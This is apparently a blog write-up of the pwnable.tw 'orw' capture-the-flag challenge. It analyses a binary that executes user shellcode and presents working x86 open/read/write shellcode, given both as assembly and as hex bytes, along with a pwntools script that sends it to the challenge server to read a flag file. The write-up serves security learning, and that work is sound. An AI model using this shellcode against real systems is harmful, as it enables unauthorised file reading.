vi
new
+1
Avatar
Kinabler @blackbird2l3
44 2 5
Đã đăng vào thg 2 23, 2023 1:54 CH 1 phút đọc
210

Pwnable.tw - pwn/orw

Exercise:

image.png

Analysis

File:

image.png File 32 bits, dynamically linked, not stripped: here is keywords of this program

Checksec

image.png
[⛔️] Buffer overflow
[✔️] Shellcode attack

IDA 32bits

image.png

  • Seeing, you will know that the read function's arguments will be written to the stack in reverse order (Little endian)
  • return value of read function: the number of bytes read is returned (zero indicates end of file), and the file position is advanced by this number. It is not an error if this number is smaller than the number of bytes requested; đọc thêm tại đây
  • ((void ()(void))shellcode)(); : such as a pointer

image.png
This is the shellcode's memory area to store data, it's located in the .bss part of the memory.

PEDA

I use the peda to double-check some information.
$shellcode_address = 0x804a060.
check mmap:
$shellcode is in the .bss area and is moved to the eax register and then called again image.png
and eax can only hold 200 bytes, ie: what I analyzed above is almost correct 😁 image.png

Exploit

Normally, we just need to send the shellcode to the server
But in this challenge, the author only allows the use of open, read, write to server.
Our aim is: Read the flag from /home/orw/flag So script of me is: open file => read file => write to monitor

  • Push into stack
push 0x0
push 0x67616c66 ;flag
push 0x2f77726f ;orw/
push 0x2f656d6f ;ome/
push 0x682f2f2f ;///h
  • SYSTEM_Open
xor ecx, ecx
xor eax, eax
mov ebx, esp  ;esp -> ebx, ebx- * file : esp
mov eax, 0x05 ;eax mode = 5, open
int 0x80      ;syscall
  • SYSTEM_Read
mov eax, 0x03 ;eax mode = 3, read
mov ebx, eax ;ebx-fd = eax, handle->/home/orw/flag (3)
mov ecx,esp   ;ecx-* buf: esp
mov edx, 0x40 ;edx-size: 0x40
int 0x80      ;syscall
  • SYSTEM_Write
mov eax, 0x04 ;eax mode = 4, write(4)
mov ebx, 0x01 ;ebx-fd: stdout(1)
int 0x80 ;syscall

So all of shellcode can write is:

push 0x0
push 0x67616c66 
push 0x2f77726f 
push 0x2f656d6f 
push 0x682f2f2f
xor ecx, ecx
xor eax, eax
mov ebx, esp  
mov eax, 0x05
int 0x80
mov eax, 0x03 
mov ebx, eax
mov ecx,esp
mov edx, 0x40
int 0x80
mov eax, 0x04 
mov ebx, 0x01
int 0x80

I use it to give shellcode
Finally, I have a script python3 to exploit:

from pwn import *

r = remote("chall.pwnable.tw",10001)

shellcode = b"\x6A\x00\x68\x66\x6C\x61\x67\x68\x6F\x72\x77\x2F\x68\x6F\x6D\x65\x2F\x68\x2F\x2F\x2F\x68\x31\xC9\x31\xC0\x89\xE3\xB8\x05\x00\x00\x00\xCD\x80\xB8\x03\x00\x00\x00\x89\xC3\x89\xE1\xBA\x40\x00\x00\x00\xCD\x80\xB8\x04\x00\x00\x00\xBB\x01\x00\x00\x00\xCD\x80"

r.sendline(shellcode)
print(r.recvuntil(b"shellcode:"))
r.interactive()

write by Kin4bler

pwn

All rights reserved

Mục lục


Viblo
Hãy đăng ký một tài khoản Viblo để nhận được nhiều bài viết thú vị hơn.
Đăng kí